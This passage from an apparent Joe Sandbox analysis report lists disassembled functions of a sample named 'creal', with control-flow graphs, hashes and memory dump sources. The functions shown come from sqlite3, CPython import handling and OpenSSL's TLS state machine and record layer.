                                                                                                                                                                                                                • Associated: 00000002.00000002.1578958590.00007FF8E701B000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7000000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AuditDeallocEval_List_Object_Sys_ThreadVectorcall$ConverterFromLongLong_ModuleModule_RestoreSaveStateThread_get_thread_identType_Unicode_sqlite3_busy_timeoutsqlite3_closesqlite3_open_v2
                                                                                                                                                                                                                • String ID: BEGIN$sqlite3.connect$sqlite3.connect/handle
                                                                                                                                                                                                                • API String ID: 3562732450-2348745481
                                                                                                                                                                                                                • Opcode ID: 8a2dca1dfa2ba05690071b078500926b146cf9129fe0a8956bc13880c2dc20a4
                                                                                                                                                                                                                • Instruction ID: b98f5ec0ccc8ee4034c1e69747e6929a21e0113449feaf2250493109d57cc260
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a2dca1dfa2ba05690071b078500926b146cf9129fe0a8956bc13880c2dc20a4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3B12836A09B4286EB608FA5E94436E73A5FB4ABE4F044835CE5D93758DF3CE450D702
                                                                                                                                                                                                                Function 00007FF8E71D14BF Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 243COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 757 7ff8e71d14bf-7ff8e722ed94 call 7ff8e71d132a * 2 764 7ff8e722f0ea-7ff8e722f104 757->764 765 7ff8e722ed9a-7ff8e722edb1 ERR_clear_error SetLastError 757->765 766 7ff8e722edb3-7ff8e722edba 765->766 767 7ff8e722edc1-7ff8e722edc8 765->767 766->767 768 7ff8e722edca-7ff8e722edce 767->768 769 7ff8e722edd6-7ff8e722ede0 767->769 770 7ff8e722edf2-7ff8e722edf7 768->770 771 7ff8e722edd0-7ff8e722edd4 768->771 769->770 772 7ff8e722ede2-7ff8e722edec call 7ff8e71d192e 769->772 774 7ff8e722edf9-7ff8e722edfc 770->774 775 7ff8e722ee03 770->775 771->769 771->770 772->764 772->770 777 7ff8e722edfe 774->777 778 7ff8e722ee07-7ff8e722ee0e 774->778 775->778 779 7ff8e722eff3 777->779 780 7ff8e722ee10-7ff8e722ee17 778->780 781 7ff8e722ee51-7ff8e722ee66 778->781 782 7ff8e722eff7-7ff8e722effa 779->782 785 7ff8e722ee19-7ff8e722ee20 780->785 786 7ff8e722ee43-7ff8e722ee4b 780->786 783 7ff8e722ee68-7ff8e722ee72 781->783 784 7ff8e722eeb5-7ff8e722eebf 781->784 787 7ff8e722f019-7ff8e722f01c 782->787 788 7ff8e722effc-7ff8e722efff call 7ff8e722e8a0 782->788 789 7ff8e722eecd-7ff8e722eee3 call 7ff8e71d20d6 783->789 790 7ff8e722ee74-7ff8e722ee77 783->790 784->789 791 7ff8e722eec1-7ff8e722eecb ERR_new 784->791 785->786 792 7ff8e722ee22-7ff8e722ee31 785->792 786->781 796 7ff8e722f01e-7ff8e722f021 call 7ff8e722f2d0 787->796 797 7ff8e722f055-7ff8e722f059 787->797 801 7ff8e722f004-7ff8e722f007 788->801 814 7ff8e722eef1-7ff8e722eef8 789->814 815 7ff8e722eee5-7ff8e722eeef ERR_new 789->815 794 7ff8e722ee79-7ff8e722ee7e 790->794 795 7ff8e722ee80-7ff8e722ee85 ERR_new 790->795 798 7ff8e722ee8a-7ff8e722eeb0 ERR_set_debug call 7ff8e71d1d93 791->798 792->786 800 7ff8e722ee33-7ff8e722ee3a 792->800 794->789 794->795 795->798 812 7ff8e722f026-7ff8e722f029 796->812 805 7ff8e722f05b-7ff8e722f05e 797->805 806 7ff8e722f060-7ff8e722f08d ERR_new ERR_set_debug call 7ff8e71d1d93 797->806 818 7ff8e722f0c3-7ff8e722f0d1 BUF_MEM_free 798->818 800->786 807 7ff8e722ee3c-7ff8e722ee41 800->807 810 7ff8e722f00d-7ff8e722f017 801->810 811 7ff8e722f0c0 801->811 805->806 808 7ff8e722f092-7ff8e722f0bb ERR_new ERR_set_debug ERR_set_error 805->808 806->808 807->781 807->786 808->811 819 7ff8e722f048-7ff8e722f04e 810->819 811->818 820 7ff8e722f02b-7ff8e722f036 812->820 821 7ff8e722f038-7ff8e722f03b 812->821 816 7ff8e722eefa-7ff8e722ef05 call 7ff8e724d85d 814->816 817 7ff8e722ef3e-7ff8e722ef41 call 7ff8e71d2086 814->817 815->798 831 7ff8e722ef16-7ff8e722ef1e call 7ff8e724cd95 816->831 832 7ff8e722ef07-7ff8e722ef11 ERR_new 816->832 830 7ff8e722ef46-7ff8e722ef48 817->830 818->764 823 7ff8e722f0d3-7ff8e722f0e1 818->823 819->782 826 7ff8e722f050-7ff8e722f053 819->826 820->819 821->811 825 7ff8e722f041 821->825 828 7ff8e722f0e8 823->828 829 7ff8e722f0e3 823->829 825->819 826->811 828->764 829->828 833 7ff8e722ef4a-7ff8e722ef4f ERR_new 830->833 834 7ff8e722ef7f-7ff8e722ef97 call 7ff8e71d1fff 830->834 839 7ff8e722ef23-7ff8e722ef26 831->839 832->798 837 7ff8e722ef54-7ff8e722ef7a ERR_set_debug call 7ff8e71d1d93 833->837 842 7ff8e722ef99-7ff8e722efa3 ERR_new 834->842 843 7ff8e722efa5-7ff8e722efa9 834->843 837->811 844 7ff8e722ef28-7ff8e722ef32 ERR_new 839->844 845 7ff8e722ef37 839->845 842->837 846 7ff8e722efab-7ff8e722efaf 843->846 847 7ff8e722efb1-7ff8e722efb8 843->847 844->798 845->817 846->847 848 7ff8e722efba-7ff8e722efc7 call 7ff8e71d186b 846->848 847->848 849 7ff8e722efe6-7ff8e722efee 847->849 848->818 852 7ff8e722efcd-7ff8e722efd4 848->852 849->779 853 7ff8e722efdf 852->853 854 7ff8e722efd6-7ff8e722efdd 852->854 853->849 854->849 854->853
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580559886.00007FF8E71D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580599471.00007FF8E7253000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581118655.00007FF8E727D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7282000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7288000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7290000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: R_new$R_set_debug$ErrorLastM_freeR_clear_errorR_set_error
                                                                                                                                                                                                                • String ID: ..\s\ssl\statem\statem.c$state_machine
                                                                                                                                                                                                                • API String ID: 1370845099-1722249466
                                                                                                                                                                                                                • Opcode ID: 236d5f13ad3ad80265c17443c4d34d4b4270ad271146e1380b34927adae8de7c
                                                                                                                                                                                                                • Instruction ID: c3a9c3365b598757086e66dc4b9c123ddba45ade24933fedb8dd566fa9072e59
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 236d5f13ad3ad80265c17443c4d34d4b4270ad271146e1380b34927adae8de7c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5A19B32E086C392FBA4AEA5D4447BD2291EF41BC4F584432DA3E46689DF3DE881D743
                                                                                                                                                                                                                Function 00007FF8E7144640 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 128COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 855 7ff8e7144640-7ff8e714467d PyImport_ImportModuleLevelObject 856 7ff8e71447fb 855->856 857 7ff8e7144683-7ff8e714468f 855->857 860 7ff8e71447fd-7ff8e7144814 856->860 858 7ff8e7144815-7ff8e7144818 857->858 859 7ff8e7144695-7ff8e71446a8 857->859 858->860 861 7ff8e71446b0-7ff8e71446c9 PyObject_GetAttr 859->861 862 7ff8e71446cb-7ff8e71446e9 PyUnicode_FromFormat 861->862 863 7ff8e7144717-7ff8e714472b 861->863 864 7ff8e714477b-7ff8e71447c2 PyErr_Clear PyModule_GetFilenameObject PyUnicode_FromFormat PyErr_SetImportError 862->864 865 7ff8e71446ef-7ff8e7144701 PyObject_GetItem 862->865 866 7ff8e714472d-7ff8e7144733 PyDict_SetItem 863->866 867 7ff8e7144735 PyObject_SetItem 863->867 868 7ff8e71447d3-7ff8e71447d6 864->868 869 7ff8e71447c4-7ff8e71447c8 864->869 870 7ff8e7144703-7ff8e7144707 865->870 871 7ff8e7144712-7ff8e7144715 865->871 872 7ff8e714473b-7ff8e7144740 866->872 867->872 876 7ff8e71447d8-7ff8e71447dc 868->876 877 7ff8e71447e7-7ff8e71447ea 868->877 869->868 875 7ff8e71447ca-7ff8e71447cd _Py_Dealloc 869->875 870->871 878 7ff8e7144709-7ff8e714470c _Py_Dealloc 870->878 871->863 871->864 873 7ff8e7144742-7ff8e7144746 872->873 874 7ff8e7144751-7ff8e7144753 872->874 873->874 879 7ff8e7144748-7ff8e714474b _Py_Dealloc 873->879 874->877 880 7ff8e7144759-7ff8e7144768 874->880 875->868 876->877 881 7ff8e71447de-7ff8e71447e1 _Py_Dealloc 876->881 877->856 882 7ff8e71447ec-7ff8e71447f0 877->882 878->871 879->874 880->858 883 7ff8e714476e-7ff8e7144776 880->883 881->877 882->856 884 7ff8e71447f2-7ff8e71447f5 _Py_Dealloc 882->884 883->861 884->856
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$ItemObject_$Err_FormatFromImportObjectUnicode_$AttrClearDict_ErrorFilenameImport_LevelModuleModule_
                                                                                                                                                                                                                • String ID: %U.%U$cannot import name %R from %R (%S)
                                                                                                                                                                                                                • API String ID: 3630264407-438398067
                                                                                                                                                                                                                • Opcode ID: fcd6dac6a765cb05053f4bfe7cd39cb166bae5586e68d4d28e2f2c7c25a5bf2f
                                                                                                                                                                                                                • Instruction ID: e8adaa27b3ce954ecea7e414dc0944b6fd82e8c83c3588c95c4d48b170aa7a5e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fcd6dac6a765cb05053f4bfe7cd39cb166bae5586e68d4d28e2f2c7c25a5bf2f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34512D36A08B82C1EA588F91E84477D63A2BB45FD6F448031CE6E47B54EF3CE4569702
                                                                                                                                                                                                                Function 00007FF8E71D24B9 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 419COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 885 7ff8e71d24b9-7ff8e72181d3 call 7ff8e71d132a 889 7ff8e72181d5-7ff8e72181e9 885->889 890 7ff8e72181f6-7ff8e721822d ERR_new ERR_set_debug call 7ff8e71d1d93 885->890 891 7ff8e72181eb-7ff8e72181f4 889->891 892 7ff8e7218232 889->892 896 7ff8e7218684-7ff8e72186a4 call 7ff8e71d19d3 890->896 891->890 894 7ff8e7218237-7ff8e7218246 891->894 892->894 897 7ff8e7218248-7ff8e721825e call 7ff8e71d241e 894->897 898 7ff8e7218264-7ff8e7218277 894->898 897->898 909 7ff8e7218677 897->909 901 7ff8e7218279-7ff8e7218280 898->901 902 7ff8e7218298-7ff8e72182a2 call 7ff8e71d1d7f 898->902 906 7ff8e721828b-7ff8e7218293 call 7ff8e71d1884 901->906 907 7ff8e7218282-7ff8e7218289 901->907 911 7ff8e72182cd-7ff8e72182d5 902->911 912 7ff8e72182a4-7ff8e72182ae call 7ff8e71d1514 902->912 906->902 907->902 907->906 913 7ff8e721867c 909->913 915 7ff8e7218304-7ff8e7218308 911->915 916 7ff8e72182d7-7ff8e72182f9 call 7ff8e71d1280 911->916 912->911 922 7ff8e72182b0-7ff8e72182b7 912->922 913->896 917 7ff8e721830e-7ff8e7218324 call 7ff8e71d2522 915->917 918 7ff8e72186a5-7ff8e72186a8 915->918 931 7ff8e721883d 916->931 932 7ff8e72182ff 916->932 917->918 933 7ff8e721832a-7ff8e7218332 917->933 923 7ff8e721861c-7ff8e721863f call 7ff8e71d2522 call 7ff8e71d24e1 918->923 924 7ff8e72186ae-7ff8e72186b5 918->924 922->911 927 7ff8e72182b9-7ff8e72182c1 922->927 944 7ff8e72186db-7ff8e72186de 923->944 945 7ff8e7218645-7ff8e7218672 ERR_new ERR_set_debug call 7ff8e71d1d93 923->945 928 7ff8e72186d0-7ff8e72186d9 924->928 929 7ff8e72186b7-7ff8e72186c6 924->929 927->913 943 7ff8e72182c7 927->943 928->913 929->928 934 7ff8e72186c8-7ff8e72186cb call 7ff8e71d1771 929->934 937 7ff8e7218849-7ff8e7218855 ERR_new 931->937 932->915 933->918 938 7ff8e7218338-7ff8e7218340 933->938 934->928 938->918 942 7ff8e7218346-7ff8e7218350 938->942 942->918 946 7ff8e7218356-7ff8e7218365 942->946 943->909 943->911 947 7ff8e7218710 944->947 948 7ff8e72186e0-7ff8e72186ea 944->948 945->909 946->918 950 7ff8e721836b-7ff8e7218383 EVP_CIPHER_CTX_get0_cipher EVP_CIPHER_get_flags 946->950 952 7ff8e7218716-7ff8e7218719 947->952 948->947 951 7ff8e72186ec-7ff8e72186fd EVP_CIPHER_CTX_get0_cipher EVP_CIPHER_get_flags 948->951 950->918 953 7ff8e7218389-7ff8e72183a2 950->953 951->947 954 7ff8e72186ff-7ff8e721870e 951->954 952->937 955 7ff8e721871f-7ff8e7218722 952->955 956 7ff8e72183a4-7ff8e72183ac 953->956 957 7ff8e72183c6-7ff8e7218414 call 7ff8e71d1771 EVP_CIPHER_CTX_ctrl call 7ff8e71d1f91 953->957 954->947 954->952 955->937 958 7ff8e7218728-7ff8e721872b 955->958 956->957 959 7ff8e72183ae-7ff8e72183b1 956->959 957->909 967 7ff8e721841a-7ff8e721842f 957->967 958->937 961 7ff8e7218731-7ff8e7218734 958->961 959->934 962 7ff8e72183b7-7ff8e72183c4 959->962 965 7ff8e721873c-7ff8e7218745 961->965 966 7ff8e7218736-7ff8e721873a 961->966 962->967 971 7ff8e7218748-7ff8e7218760 965->971 966->971 969 7ff8e721860f-7ff8e7218617 call 7ff8e71d1771 967->969 970 7ff8e7218435-7ff8e721843c 967->970 969->923 972 7ff8e721843e-7ff8e721844a 970->972 973 7ff8e7218450-7ff8e72184d3 EVP_CIPHER_CTX_ctrl 970->973 975 7ff8e7218762-7ff8e7218765 971->975 976 7ff8e7218776-7ff8e7218783 971->976 972->931 972->973 973->969 977 7ff8e72184d9-7ff8e72184e0 973->977 979 7ff8e72187a0-7ff8e72187c9 call 7ff8e71d2185 975->979 980 7ff8e7218767-7ff8e7218774 975->980 976->979 981 7ff8e7218785-7ff8e721878d 976->981 977->969 984 7ff8e72184e6-7ff8e721851f EVP_CIPHER_CTX_ctrl 977->984 987 7ff8e72187ce-7ff8e72187d0 979->987 980->979 985 7ff8e7218798-7ff8e721879e 981->985 986 7ff8e721878f-7ff8e7218793 981->986 984->909 988 7ff8e7218525-7ff8e7218539 984->988 985->979 985->981 986->985 987->931 989 7ff8e72187d2-7ff8e72187da 987->989 990 7ff8e721853b-7ff8e721854c 988->990 991 7ff8e7218565-7ff8e72185b8 call 7ff8e71d1280 988->991 992 7ff8e72187dc-7ff8e72187e0 989->992 993 7ff8e72187f6-7ff8e7218803 989->993 994 7ff8e7218550-7ff8e7218557 990->994 1002 7ff8e72185ba-7ff8e72185c2 991->1002 1003 7ff8e72185e1-7ff8e72185e3 991->1003 997 7ff8e72187eb-7ff8e72187f1 992->997 998 7ff8e72187e2-7ff8e72187e9 992->998 999 7ff8e7218805-7ff8e721880c 993->999 1000 7ff8e7218827-7ff8e7218833 993->1000 994->991 1001 7ff8e7218559-7ff8e7218563 994->1001 997->961 998->993 998->997 999->1000 1004 7ff8e721880e-7ff8e721881d 999->1004 1000->931 1001->991 1001->994 1005 7ff8e72185c8-7ff8e72185d5 1002->1005 1006 7ff8e721881f-7ff8e7218822 call 7ff8e71d1771 1002->1006 1007 7ff8e72185e5-7ff8e72185ec 1003->1007 1008 7ff8e7218604-7ff8e721860d 1003->1008 1004->1000 1004->1006 1005->969 1009 7ff8e72185d7-7ff8e72185dc 1005->1009 1006->1000 1010 7ff8e72185fc-7ff8e72185ff call 7ff8e71d1771 1007->1010 1011 7ff8e72185ee-7ff8e72185fa BIO_test_flags 1007->1011 1008->913 1009->970 1010->1008 1011->1008 1011->1010
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580559886.00007FF8E71D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580599471.00007FF8E7253000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581118655.00007FF8E727D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7282000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7288000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7290000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: R_newX_ctrl$R_get_flagsR_set_debugX_get0_cipher$O_test_flags
                                                                                                                                                                                                                • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_bytes
                                                                                                                                                                                                                • API String ID: 2309317691-176253594
                                                                                                                                                                                                                • Opcode ID: 2e71b247f815af5fdb73305ed2dee3af8b68089cb2368134a97cf839ed5b4a1c
                                                                                                                                                                                                                • Instruction ID: 81d799da0edb5d6c03bb0d5e664aad55f64c5377e85955b52c3ff880eb76e269
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e71b247f815af5fdb73305ed2dee3af8b68089cb2368134a97cf839ed5b4a1c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D028A22A08B8686EB50DFA5D4847BD27A1FB44BE8F180075DE6E47B99DF3CE445C702
                                                                                                                                                                                                                Function 00007FF8E722E8A0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 207COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 1014 7ff8e722e8a0-7ff8e722e8d1 call 7ff8e71d132a 1017 7ff8e722e8d3-7ff8e722e8da 1014->1017 1018 7ff8e722e8e1-7ff8e722e939 1014->1018 1017->1018 1019 7ff8e722e93b-7ff8e722e945 1018->1019 1020 7ff8e722e948-7ff8e722e94c 1018->1020 1019->1020 1021 7ff8e722e950-7ff8e722e955 1020->1021 1022 7ff8e722e957-7ff8e722e95a 1021->1022 1023 7ff8e722e994-7ff8e722e9aa 1021->1023 1024 7ff8e722e960-7ff8e722e963 1022->1024 1025 7ff8e722ea74-7ff8e722ea8a 1022->1025 1026 7ff8e722e9ac-7ff8e722e9b1 call 7ff8e71d26bc 1023->1026 1027 7ff8e722e9b3 call 7ff8e71d2261 1023->1027 1030 7ff8e722e969-7ff8e722e978 1024->1030 1031 7ff8e722eb60-7ff8e722eb65 ERR_new 1024->1031 1028 7ff8e722ea8c-7ff8e722ea91 call 7ff8e71d15dc 1025->1028 1029 7ff8e722ea93 call 7ff8e71d11cc 1025->1029 1034 7ff8e722e9b8-7ff8e722e9ba 1026->1034 1027->1034 1044 7ff8e722ea98-7ff8e722ea9a 1028->1044 1029->1044 1030->1020 1048 7ff8e722e97a-7ff8e722e98a 1030->1048 1035 7ff8e722eb6a-7ff8e722eb88 ERR_set_debug 1031->1035 1039 7ff8e722e9c0-7ff8e722e9c3 1034->1039 1040 7ff8e722ec31 1034->1040 1041 7ff8e722ec26-7ff8e722ec2c call 7ff8e71d1d93 1035->1041 1046 7ff8e722e9e1-7ff8e722e9ed 1039->1046 1047 7ff8e722e9c5-7ff8e722e9d7 1039->1047 1045 7ff8e722ec33-7ff8e722ec4a 1040->1045 1041->1040 1044->1040 1049 7ff8e722eaa0-7ff8e722eab8 1044->1049 1046->1040 1056 7ff8e722e9f3-7ff8e722ea03 1046->1056 1051 7ff8e722e9d9 1047->1051 1052 7ff8e722e9de 1047->1052 1048->1023 1053 7ff8e722eabe-7ff8e722ead7 call 7ff8e71d13d9 1049->1053 1054 7ff8e722ebf1-7ff8e722ebfb ERR_new 1049->1054 1051->1052 1052->1046 1057 7ff8e722ead9-7ff8e722eae4 1053->1057 1054->1035 1068 7ff8e722ea09-7ff8e722ea17 1056->1068 1069 7ff8e722ec00-7ff8e722ec22 ERR_new ERR_set_debug 1056->1069 1058 7ff8e722eaea-7ff8e722eaed 1057->1058 1059 7ff8e722ebd6-7ff8e722ebda 1057->1059 1063 7ff8e722eaf3-7ff8e722eaf6 1058->1063 1064 7ff8e722ebb7-7ff8e722ebc5 1058->1064 1060 7ff8e722ebdc-7ff8e722ebe0 1059->1060 1061 7ff8e722ebe2-7ff8e722ebec ERR_set_debug ERR_new 1059->1061 1060->1040 1060->1061 1061->1041 1070 7ff8e722eaf8-7ff8e722eafb 1063->1070 1071 7ff8e722eb00-7ff8e722eb0e 1063->1071 1065 7ff8e722ebcf-7ff8e722ebd4 1064->1065 1066 7ff8e722ebc7-7ff8e722ebca call 7ff8e71d254f 1064->1066 1065->1045 1066->1065 1073 7ff8e722ea19-7ff8e722ea1c 1068->1073 1074 7ff8e722ea65-7ff8e722ea6d 1068->1074 1069->1041 1070->1021 1071->1021 1073->1074 1075 7ff8e722ea1e-7ff8e722ea3f BUF_MEM_grow_clean 1073->1075 1074->1025 1076 7ff8e722eb8d-7ff8e722ebb5 ERR_new ERR_set_debug 1075->1076 1077 7ff8e722ea45-7ff8e722ea48 1075->1077 1076->1041 1077->1076 1078 7ff8e722ea4e-7ff8e722ea63 1077->1078 1078->1074
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580559886.00007FF8E71D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580599471.00007FF8E7253000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581118655.00007FF8E727D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7282000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7288000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7290000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: ..\s\ssl\statem\statem.c$read_state_machine
                                                                                                                                                                                                                • API String ID: 0-3323778802
                                                                                                                                                                                                                • Opcode ID: 226199113d5c6b0f94b2c4bd83232d79919058d5f83b7f5b7b7cc92fd9dd9c15
                                                                                                                                                                                                                • Instruction ID: 6e3f24cf3d72d778296c0034f6746c307a636629e579466f601dea80ec3ad4db
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 226199113d5c6b0f94b2c4bd83232d79919058d5f83b7f5b7b7cc92fd9dd9c15
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF917C32E0868781EB60AFA5D4583BD2761FF44BC8F584136DA3E47695DE3CE486E702
                                                                                                                                                                                                                Function 00007FF8E71F9060 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 89COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580559886.00007FF8E71D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580599471.00007FF8E7253000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581118655.00007FF8E727D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7282000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7288000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7290000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                • String ID: ..\s\ssl\ssl_lib.c$ssl_write_internal
                                                                                                                                                                                                                • API String ID: 1552677711-2859347552
                                                                                                                                                                                                                • Opcode ID: f0637090c2e1248d2c4bd495b210b8b391bd17863f591ec7249c3c5e694070ae
                                                                                                                                                                                                                • Instruction ID: 74d1e8f2ad75f8259fe56eed024893df87d12f00b37c6a2c44900e20585b3781
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0637090c2e1248d2c4bd495b210b8b391bd17863f591ec7249c3c5e694070ae
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9541AF31A0CB8286F754EB94E8413ED2251EF84BD4F544131EA6E477E6DF3CE8458742
                                                                                                                                                                                                                Function 00007FF8E7148EC3 Relevance: 19.6, APIs: 13, Instructions: 140COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
